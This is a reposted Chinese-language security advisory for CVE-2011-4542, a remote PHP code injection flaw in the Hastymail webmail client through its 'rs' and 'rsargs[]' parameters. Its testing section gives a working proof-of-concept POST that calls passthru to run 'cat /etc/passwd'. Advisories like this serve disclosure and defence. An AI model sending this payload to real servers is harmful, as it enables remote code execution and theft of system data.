Hastymail “rs"和"rsargs[]”参数远程代码注入漏洞

发布日期:2011-11-23
更新日期:2011-11-28

受影响系统:
Hastymail Hastymail
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 50794
CVE ID: CVE-2011-4542

Hastymail是一个用PHP编写的快速、安全、兼容RFC、跨平台的IMAP/SMTP客户端应用程序。

Hastymail实现上存在输入验证漏洞,篡改后的$_POST['rs']和$_POST['rsargs[]']输入参数没有被正确检查过滤,攻击者可利用这些漏洞注入和执行任意代码,导致Web服务器执行任意PHP代码、泄露敏感信息、删除任意文件。

<*来源:BTeixeira
 
  链接:https://www.dognaedis.com/vulns/DGS-SEC-3.html
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

GET: /?page=mailbox&mailbox=Drafts"><app_base>/?page=mailbox&mailbox=Drafts
POST: rs=passthru&rsargs[]=asd&rsargs[]=cat /etc/passwd

建议:
--------------------------------------------------------------------------------
厂商补丁:

Hastymail
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwfygz.html